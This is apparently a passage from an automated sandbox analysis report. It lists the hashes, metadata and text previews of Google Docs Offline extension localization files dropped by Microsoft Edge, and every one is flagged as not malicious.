Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):806
Entropy (8bit):4.815663786215102
Encrypted:false
SSDEEP:
MD5:A86407C6F20818972B80B9384ACFBBED
SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\da\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):883
Entropy (8bit):4.5096240460083905
Encrypted:false
SSDEEP:
MD5:B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\de\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1031
Entropy (8bit):4.621865814402898
Encrypted:false
SSDEEP:
MD5:D116453277CC860D196887CEC6432FFE
SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\el\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1613
Entropy (8bit):4.618182455684241
Encrypted:false
SSDEEP:
MD5:9ABA4337C670C6349BA38FDDC27C2106
SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\en\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):851
Entropy (8bit):4.4858053753176526
Encrypted:false
SSDEEP:
MD5:07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\en_GB\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):848
Entropy (8bit):4.494568170878587
Encrypted:false
SSDEEP:
MD5:3734D498FB377CF5E4E2508B8131C0FA
SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\en_US\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1425
Entropy (8bit):4.461560329690825
Encrypted:false
SSDEEP:
MD5:578215FBB8C12CB7E6CD73FBD16EC994
SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:false
Reputation:unknown
Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\es\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):961
Entropy (8bit):4.537633413451255
Encrypted:false
SSDEEP:
MD5:F61916A206AC0E971CDCB63B29E580E3
SHA1:994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\es_419\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):959
Entropy (8bit):4.570019855018913
Encrypted:false
SSDEEP:
MD5:535331F8FB98894877811B14994FEA9D
SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\et\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):968
Entropy (8bit):4.633956349931516
Encrypted:false
SSDEEP:
MD5:64204786E7A7C1ED9C241F1C59B81007
SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\eu\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):838
Entropy (8bit):4.4975520913636595
Encrypted:false
SSDEEP:
MD5:29A1DA4ACB4C9D04F080BB101E204E93
SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:false
Reputation:unknown
Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\fa\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1305
Entropy (8bit):4.673517697192589
Encrypted:false
SSDEEP:
MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\fi\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):911
Entropy (8bit):4.6294343834070935
Encrypted:false
SSDEEP:
MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\fil\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):939
Entropy (8bit):4.451724169062555
Encrypted:false
SSDEEP:
MD5:FCEA43D62605860FFF41BE26BAD80169
SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\fr\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):977
Entropy (8bit):4.622066056638277
Encrypted:false
SSDEEP:
MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\fr_CA\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):972
Entropy (8bit):4.621319511196614
Encrypted:false
SSDEEP:
MD5:6CAC04BDCC09034981B4AB567B00C296
SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\gl\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):990
Entropy (8bit):4.497202347098541
Encrypted:false
SSDEEP:
MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\gu\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1658
Entropy (8bit):4.294833932445159
Encrypted:false
SSDEEP:
MD5:BC7E1D09028B085B74CB4E04D8A90814
SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\hi\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1672
Entropy (8bit):4.314484457325167
Encrypted:false
SSDEEP:
MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\hr\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):935
Entropy (8bit):4.6369398601609735
Encrypted:false
SSDEEP:
MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:false
Reputation:unknown
Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6872_1898885788\CRX_INSTALL\_locales\hu\messages.json

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1065
Entropy (8bit):4.816501737523951
Encrypted:false
SSDEEP:
MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
